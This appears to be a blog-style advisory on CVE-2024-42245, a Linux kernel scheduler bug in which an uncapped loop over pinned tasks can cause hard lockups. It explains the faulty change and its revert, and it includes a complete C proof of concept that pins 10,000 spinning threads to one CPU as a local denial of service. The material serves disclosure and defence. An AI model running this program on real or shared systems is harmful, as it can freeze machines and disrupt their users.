CVE-2024-42245 - O(n) Iteration Vulnerability in Linux Kernel’s sched/fair Leading to Hard Lockups

Published: June 2024

Severity: High (DoS / Hard lockup risk)

A high-severity vulnerability, identified as CVE-2024-42245, was resolved in the Linux kernel scheduler code (sched/fair). The issue could cause hard lockups on systems running an affected kernel, and was notably reproducible in environments with heavy use of thread CPU affinity, where thousands of threads are pinned to a single core.

This article explains in plain terms what happened, how the bug could be exploited, and how it was fixed, with code snippets demonstrating the problem and pointers to official sources.

What’s the Story? How Did CVE-2024-42245 Happen?

In kernel commit b0defa7ae03ecf91b8bfd10ede430cff12fcbd06, a developer aimed to improve load balancing in the scheduler. The update made the kernel’s CPU load balancing logic more “aggressive” by ignoring its previous limit on the number of loop iterations (env.loop_max) whenever all tasks examined so far were “pinned” (bound to a CPU, so they can’t move). This was supposed to help unearth movable tasks buried in huge lists of unmovable ones.

But disaster struck. In real-world use, especially with workloads that rely on thread pinning (affinity), this new logic could make the kernel traverse massive task lists (think: 10,000+ threads all pinned to a single CPU). Because the kernel performs this load balancing with per-CPU run queue locks held (and in "softirq" context), the resulting O(n) loop could stall the CPU long enough to trigger a hard lockup, an unrecoverable freeze.

Quick Code Walkthrough: Where Was the Problem?

The core issue was with how the scheduler’s detach_tasks() function interacts with per-CPU run queue task lists.

Here’s a simplified, illustrative snippet:

// env.loop_max is meant to limit how many tasks one pass examines
for_each_task_on_cpu(cpu) {
    if (task_pinned(task))
        continue; // skip, can't move

    // Try to detach a movable task...
    break;
}

The problematic change removed the loop limiter when tasks are pinned:

// Before the buggy commit:
int loops = 0;
for_each_task_on_cpu(cpu) {
    if (loops++ >= env.loop_max) break;
    if (task_pinned(task)) continue;
    // try_detach...
}

// After the buggy commit:
// The loop break on env.loop_max is *ignored* while every task seen so far is pinned
// (all_pinned_so_far stands in for the kernel's LBF_ALL_PINNED flag)
int loops = 0;
for_each_task_on_cpu(cpu) {
    if (loops++ >= env.loop_max && !all_pinned_so_far) break;
    if (task_pinned(task)) continue;
    // try_detach...
    // ...the loop runs through *every* task if they're all pinned!
}

This change might seem harmless when a run queue holds only a few tasks, but with 10,000 pinned threads it means traversing 10,000 tasks in a single pass with the run queue lock held, stalling the scheduler and the CPU.

Exploiting CVE-2024-42245: Easy Local DoS

Anyone with the ability to set thread affinity and create many threads can trigger this kernel hard lockup. Here’s a simple recipe:

1. Create a large number of threads (thousands).

2. Pin all of them to a single CPU.

3. Kick off activity across these threads (so the scheduler needs to balance them).

4. Observe kernel hard lockups / system freeze.

Example (pure C)

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#define THREADS 10000

// Each thread pins itself to CPU 0, then spins forever.
void* f(void* d) {
    cpu_set_t c;
    CPU_ZERO(&c);
    CPU_SET(0, &c);
    sched_setaffinity(0, sizeof(c), &c); // pid 0 = the calling thread
    while (1) {} // Busy wait
    return NULL; // not reached
}

int main(void) {
    pthread_t th[THREADS];
    for (int i = 0; i < THREADS; ++i)
        pthread_create(&th[i], NULL, f, NULL);
    for (int i = 0; i < THREADS; ++i)
        pthread_join(th[i], NULL);
    return 0;
}

*Don’t run this on a production machine!*

Impact and Risk

- Affected: Linux kernels that include commit b0defa7ae03ecf91b8bfd10ede430cff12fcbd06, mostly from mid-2023 to June 2024.
- Impact: Any local user (no root privileges needed) can hang a CPU, causing a system-wide disruption or DoS (Denial of Service).
- Triggers: Massive thread affinity usage (attackers, HPC, bad apps, CI/CD with thread pinning).
- Resolution: Revert the offending patch and restore the loop limit unconditionally.

Fix & Resolution

Official Fix:

The kernel team reverted the problematic commit. See

- Linus’ git revert commit
- Mail thread on LKML — with discussion led by Peter Zijlstra, Vincent Guittot, and others.

Fixed commit message snippet

Revert "sched/fair: Make sure to try to detach at least one movable task"

This reverts commit b0defa7ae03ecf91b8bfd10ede430cff12fcbd06.
...

How To Protect Yourself

- Update your kernel to a version with the faulty patch reverted (6.10-rc4 or later, or a vendor kernel with the fix backported).

- Monitor for suspicious thread pinning: on multi-user servers, watch for processes that pin unusually large numbers of threads to a single CPU.

- Rate-limit user threads (set user process/thread limits), especially from untrusted or containerized workloads.

References

- Linus’ Revert Commit
- Original (bad) commit
- LKML discussion & context
- CVE page (NVD) *(Note: Page may lag official kernel fix)*

In summary:
CVE-2024-42245 made it easy for anyone to lock up a Linux CPU just by pinning enough threads, due to removed loop limits in the scheduler. The safest fix is to update your kernel as soon as possible.

If you manage Linux systems exposed to untrusted code or heavy affinity use, patch now!

Timeline

Published on: 08/07/2024 16:15:47 UTC
Last modified on: 08/08/2024 14:53:19 UTC